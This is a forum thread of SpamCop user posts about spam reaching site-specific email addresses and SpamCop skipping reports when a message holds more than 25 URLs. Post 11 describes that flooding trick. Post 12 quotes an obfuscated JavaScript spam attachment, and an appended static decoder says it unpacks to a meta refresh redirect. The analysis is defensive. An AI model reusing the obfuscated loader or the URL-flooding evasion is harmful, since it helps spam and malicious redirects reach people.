About MisterBill

  1. I have my own domain, and I use different email addresses at different sites (like starbucks[at]mydomain.us) so I can tell where my address came from if/when their mailing list gets stolen (I use wildcard forwarding so I don't need to define each address). It turns out that this happens a lot more often than you'd think, and I've been getting emails at addresses used at only a single site for a while now. They seem to come in batches; typically it's some of the nasty stuff with attachments, and thanks to Spamcop I've determined that it comes from different sites, so I'm guessing it's being sent by zombie machines. Interestingly, I rarely get this spam at addresses that I've never used, so this says to me that something is getting these addresses and I'd like to know how. I've always figured that it was various sites that got hacked. My email addresses from sites like Consumerist, Couponmom and Opentable routinely get spam. Some of those that have been compromised for a while I've set up dummy forwarding for (to a non-existent address) so I don't get those anymore. I got a really huge batch of this spam today (it's been bad for the past week), and included in it was one sent to a "citi" address, which I've used for Citibank and nothing else (and this is the first time I've seen spam sent to it). So this means that either their database has been hacked, or else the spammers are getting my addresses from some other source. My mail is forwarded through Namecheap's forwarding service to my Verizon mailbox. It seems like they'd be getting it from one of those sources, or from my machine, and I think that the latter is pretty unlikely. Fortunately all of this stuff ends up in my Verizon spam folder, but I would love to figure out how this is happening. Any ideas?
  2. I'm also seeing this problem, and it's occurring with email sent by Mailwasher and the piece of mail being tossed likely had multiple pieces of spam in it, all of which are presumably lost. Are you still interested in receiving a copy of the email to investigate? Sadly, I don't think it contains what was sent, which would be useful.
  3. This is still a problem. I got this spam reporting rejected today. Can someone tell me what the IPv6 header is? They look OK to me. http://www.spamcop.net/sc?id=z5246558407z8...;action=display
  4. Thanks for the link. I agree that reporting email addresses in the header is useless. But that page says that reporting the address where the spammer is expecting replies can be useful. Yet it does not do it. I prefer to have something like Spamcop doing the reporting because it is anonymous. If I have to send it with my real email address and find out that the spammer also owns the domain I am reporting him to (i.e., he is getting the complaint), I will likely get much more spam as a result.
  5. I've recently started getting a lot of spam from a hosting company. There is no website to report but there is a mailto that they have responses going to. However, Spamcop is not sending any notice to that site. Is there a reason? Seems like an address that gets replies is going to be real, so definitely the site owner should be notified. http://www.spamcop.net/sc?id=z4996578016z3...7ff1799c84ceeaz
  6. Not to belabor the point, but the net result was the same. Changing the URLs so that enough of them were alike or deleting a bunch, both reduced the count of URLs to allow Spamcop to report on a number it considers acceptable. In both cases it changed the behavior of Spamcop because it would not have reported any URLs otherwise.
  7. Thanks. But once again, it appears that deleting lines is just as bad as changing URLs. So I don't understand why that was suggested as an acceptable solution.
  8. I had not thought of deleting lines, but how is doing that any different than changing the URL to be the same domain as others already in the email? Either way, the mail has been doctored. It's not like I am adding new domains to be reported, so the result is the same as deleting the lines.
  9. Well, given that the emails seemed to come from different locations, I assume they were being sent by zombie machines, which made the mail origin not very useful, either.
  10. Sorry, I did not want to post the URL because I thought that it would have my actual email address in the source, but I see that it's x'ed out. This is not the link for the email that I posted above, but it is a similar one (turns out they were using several different domains; I discovered this when processing the rest of the spam I had received). http://www.spamcop.net/sc?id=z4993364257z6...9710e86d3c2b5fz And the issue is not that some of the domain names are not valid and cannot be resolved -- it's that Spamcop doesn't even try because there are more than 25 in the email, so it stops processing any of them. It seems like a really simple way for a spammer to avoid getting their domains reported. Just overload Spamcop with a bunch of different hosts, and none get reported.
  11. I've started getting Viagra spam at multiple addresses at my private domain which have clearly been stolen from other sites. Making things worse, the sleazy spammer is using multiple random first level names on their domain (example: http://lpijuxl.domcitystr.com), so Spamcop stops looking at URLs after the first 25 and does not report any of them! I tried playing with it and changed a bunch of the URLs to be the same and it was going to report to: spam[at]ccert.edu.cn anti-spam[at]mail.sxptt.zj.cn abuse#anti-spam.cn[at]devnull.spamcop.net What can be done to fix Spamcop so it can't get tricked by spammers like this and DOES report? Granted, reporting to this site is not likely to result in the spammer being stopped, but it would be nice to have it sent so it can be tracked. I wonder if the spammer is actually doing this to break Spamcop, or for another reason. Here is the spam with my domain and forwarding email at my ISP x'ed out: Admin Edit: entire spam posting removed. Things like this are why the use of a Tracking URL is requested.
  12. I got spam which had a java scri_pt portion to it. I can't figure out what it is trying to do, can someone help? The email claimed there was a PDF to view, I will attach the whole section for context. Content-type: text/html; name="61114Journal Sentinel - Leka Obit.html" Content-transfer-encoding: 7BIT Content-disposition: attachment; filename="61114Journal Sentinel - Leka Obit.html" <scri_pt language="java scri_pt" type="text/java scri_pt">function xfxs(oajm){var cz58="sr:0.cpt/ =\"xg;lhivm-quoefn>a<",iwy0,qyot,n3dt="",vvg8,wo2u=cz58.length;enum(unescape("%66un%63ti%6Fn l%6A2w%28fs%61a){%6E3d%74+=%66saa%7D"));for(qyot=0;qyot<oajm.length;qyot++){iwy0=oajm.charAt(qyot);vvg8=cz58.indexOf(iwy0);if(vvg8>-1){vvg8-=(qyot+1)%wo2u;if(vvg8<0){vvg8+=wo2u;}lj2w(cz58.charAt(vvg8));}else{lj2w(iwy0);}}enum(unescape("%64oc%75me%6Et.w%72it%65(n%33dt)%3Bn3%64t=%22%22;"));}xfxs("sq>\"0lolhhrp.p:.><-;hoie\"tp0un/n<\"li=ur\"nu<quumn>>loieo alefv m=q<;rgl.rqnm:et.rss-");</scri_pt><noscript>To display this page you need a browser that supports java scri_pt.</noscript> --Boundary_(ID_pbZ6Ms2kvXLizaqNrjbRog)--
  13. Looks fixed to me. Thanks.
  14. See, it is a trick!
  15. If you click on the already submitted spam's link, then you need to scroll down and see that it claims that it already submitted it (and then come here and complain that it's processing the same spam multiple times, when in reality that is not the actual problem). If you just wait until the link is updated, you know that it's going to work. More of a secret than a trick, if you want. Because I don't think that is what it's doing. It's not skipping it because you process it again. It's just finally getting around to updating the queue to show that the mail has already been processed. If the system is particularly slow, as I saw it was one day last week, it's possible that it would want you to process the same piece of mail a third time. The bottom line is that I strongly doubt that "processing" the mail a second time is what is causing the correct mail to show up. It's a timing issue, and by the time you "process" it again, it's got the correct one at the top of the list.
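
For the obfuscated attachment quoted in post 12, the decoding loop can be reproduced statically, without evaluating the sample or writing anything to a page. This is an added example, not part of the original posts; the function names `decode`, `refreshTarget`, `revealHidden` and `analyze` are assumptions, while the alphabet, payload and percent-encoded strings are copied from the quoted sample. The payload decodes to a meta refresh redirect.

```javascript
// Added example: static decode of the attachment quoted in post 12.
// Nothing is evaluated and nothing is written to a DOM.

// Alphabet and payload copied from the quoted sample (JS string escapes resolved).
const ALPHABET = 'sr:0.cpt/ ="xg;lhivm-quoefn>a<';
const PAYLOAD = 'sq>"0lolhhrp.p:.><-;hoie"tp0un/n<"li=ur"nu<quumn>>loieo alefv m=q<;rgl.rqnm:et.rss-';

// The two percent-encoded strings the sample hides, decoded as text only.
const HIDDEN = [
  '%66un%63ti%6Fn l%6A2w%28fs%61a){%6E3d%74+=%66saa%7D',
  '%64oc%75me%6Et.w%72it%65(n%33dt)%3Bn3%64t=%22%22;',
];
function revealHidden() {
  return HIDDEN.map((s) => decodeURIComponent(s));
}

// Same arithmetic as xfxs(): a character found in the alphabet is shifted
// back by (position + 1) mod alphabet length; anything else passes through.
function decode(payload, alphabet) {
  let out = '';
  for (let i = 0; i < payload.length; i++) {
    const idx = alphabet.indexOf(payload[i]);
    if (idx === -1) { out += payload[i]; continue; }
    const n = alphabet.length;
    out += alphabet[(((idx - (i + 1) % n) % n) + n) % n];
  }
  return out;
}

// Pull the redirect target out of a decoded meta refresh and defang it
// so it can be pasted into a report without becoming a clickable link.
function refreshTarget(html) {
  const m = /http-equiv="refresh"\s+content="\d+;\s*url=([^"]+)"/i.exec(html);
  if (!m) return null;
  return m[1].replace(/^http/i, 'hxxp').replace(/\./g, '[.]');
}

function analyze() {
  const html = decode(PAYLOAD, ALPHABET);
  return { html, target: refreshTarget(html), hidden: revealHidden() };
}

console.log(analyze());
```

The defanged `target` value is the one to pass on to an abuse desk, since the redirect destination never appears in clear text in the message.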